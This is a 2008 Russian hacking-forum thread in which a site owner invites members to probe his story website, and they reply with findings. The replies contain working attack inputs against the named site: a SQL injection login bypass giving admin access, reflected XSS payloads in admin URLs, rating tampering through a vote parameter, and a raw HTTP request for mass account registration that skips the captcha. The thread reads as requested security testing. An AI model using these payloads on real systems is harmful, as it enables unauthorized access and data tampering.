Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Проверка на уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=110)
-   -   Проверте на надёжность (https://forum.antichat.xyz/showthread.php?t=79307)

dimankoresh 01.08.2008 12:08
Проверте на надёжность
 
http://concept.ds8.ru

буду благодарен за нахождение дыр в безопастности

tor4) 01.08.2008 12:45
При регистрации.
Логин ' раs '

Вёдоёт

Warning: DOMDocument::loadXML() [domdocument.loadxml]: attributes construct error in Entity, line: 63 in /www_host/hosts/concept.ds8.ru/core_functions.php on line 76

Warning: DOMDocument::loadXML() [domdocument.loadxml]: Couldn't find end of Start Tag login line 63 in Entity, line: 63 in /www_host/hosts/concept.ds8.ru/core_functions.php on line 76

dimankoresh 01.08.2008 12:56
Цитата:
Сообщение от tor4)
При регистрации.
Логин ' раs '

Вёдоёт

Warning: DOMDocument::loadXML() [domdocument.loadxml]: attributes construct error in Entity, line: 63 in /www_host/hosts/concept.ds8.ru/core_functions.php on line 76

Warning: DOMDocument::loadXML() [domdocument.loadxml]: Couldn't find end of Start Tag login line 63 in Entity, line: 63 in /www_host/hosts/concept.ds8.ru/core_functions.php on line 76
это тебе что-то не повезло видать. сервак там щас глючит, только что зарегил такого без проблем

BlackSun 01.08.2008 20:37
Та же фигня, регался с ником "><hr>

Цитата:
<br />
<b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: Unescaped '&lt;' not allowed in attributes values in Entity, line: 119 in <b>/www_host/hosts/concept.ds8.ru/core_functions.php</b> on line <b>76</b><br />
<br />
<b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: attributes construct error in Entity, line: 119 in <b>/www_host/hosts/concept.ds8.ru/core_functions.php</b> on line <b>76</b><br />
<br />
<b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: Couldn't find end of Start Tag login line 119 in Entity, line: 119 in <b>/www_host/hosts/concept.ds8.ru/core_functions.php</b> on line <b>76</b><br />
<br />
<b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: Opening and ending tag mismatch: hr line 119 and site in Entity, line: 443 in <b>/www_host/hosts/concept.ds8.ru/core_functions.php</b> on line <b>76</b><br />
<br />
<b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: Premature end of data in tag site line 2 in Entity, line: 444 in <b>/www_host/hosts/concept.ds8.ru/core_functions.php</b> on line <b>76</b><br />

tor4) 01.08.2008 21:19
Обращение к бд только при регистрации, что-ли?

desTiny 01.08.2008 21:29
sql inject в логине:
логин: ' or '1'=1'
пасс: любой

Здрасте, админ)

add:
админка http://concept.ds8.ru/admin

BlackSun 01.08.2008 21:33
XSS
http://concept.ds8.ru/admin/login.php?page="><script>alert()</script>&ide=
http://concept.ds8.ru/admin/login.php?page=&ide="><script>alert()</script>

desTiny 01.08.2008 21:39
от имени админа у меня добавляются только пустые комменты

Ershik 01.08.2008 21:52
http://concept.ds8.ru/erotic
http://concept.ds8.ru/avto

И прочеее

Цитата:
core_functions.php on line 76

Warning: DOMDocument::loadXML() [domdocument.loadxml]: Couldn't find end of Start Tag back line 56 in Entity, line: 56 in /www_host/hosts/concept.ds8.ru/core_functions.php on line 76

BlackSun 01.08.2008 21:57
http://concept.ds8.ru/addvoce.php?story={id рассказа}&b=999999
Итого: рейтинг у рассказа - 999999 :D

BlackSun 01.08.2008 22:01
В добавлении нового рассказа фильтрация только на стороне клиента, мона заслать оч длинный текст ..

было
<textarea class="add border" id="addvariant" onchange="validate('addvariant')" onkeyup="validate('addvariant')"></textarea>

стало
<textarea class="add border" id="addvariant"></textarea>

desTiny 01.08.2008 22:12
Цитата:
Сообщение от BlackSun
http://concept.ds8.ru/addvoce.php?story={id рассказа}&b=999999
Итого: рейтинг у рассказа - 999999 :D
гы гы: http://concept.ds8.ru/addvoce.php?story={id рассказа}&b=-999999
и облом твоим стараниям))

dimankoresh 04.08.2008 09:57
вроде всё поправил) спасибо за глюки, недосмотрел, если не лень проверте ещё разок)

BlackSun 04.08.2008 10:21
http://concept.ds8.ru/erotic/comments_"><>

Цитата:
Warning: DOMDocument::loadXML() [domdocument.loadxml]: Unescaped '<' not allowed in attributes values in Entity, line: 50 in /www_host/hosts/concept.ds8.ru/core_functions.php on line 76

Warning: DOMDocument::loadXML() [domdocument.loadxml]: attributes construct error in Entity, line: 50 in /www_host/hosts/concept.ds8.ru/core_functions.php on line 76

Warning: DOMDocument::loadXML() [domdocument.loadxml]: Couldn't find end of Start Tag theway line 50 in Entity, line: 50 in /www_host/hosts/concept.ds8.ru/core_functions.php on line 76

Warning: DOMDocument::loadXML() [domdocument.loadxml]: StartTag: invalid element name in Entity, line: 50 in /www_host/hosts/concept.ds8.ru/core_functions.php on line 76

dimankoresh 21.08.2008 08:45
Цитата:
Сообщение от BlackSun
http://concept.ds8.ru/erotic/comments_"><>
спасиб

TR0J@N 21.08.2008 09:55
Регаем армию писателей)
Код:
POST http://concept.ds8.ru/registration HTTP/1.0
Accept: */*
Referer: http://concept.ds8.ru/registration
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0
Host: concept.ds8.ru
Content-Length: 127
Pragma: no-cache
Cookie: PHPSESSID=

login=ЛОГИН&pass=ПАРОЛЬ&pass2=ПАРОЛЬ&email=МЫЛО&capcha=&reg_in=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C

Isis 21.08.2008 09:55
Я чего-то натворил..
Регнулся под '+or+1=1/* и под '"/><script>alert(/1/)</script> и на главной теперь неверно ведуться ссылки на последние каменты, рассказы и прочее :)


Время: 04:54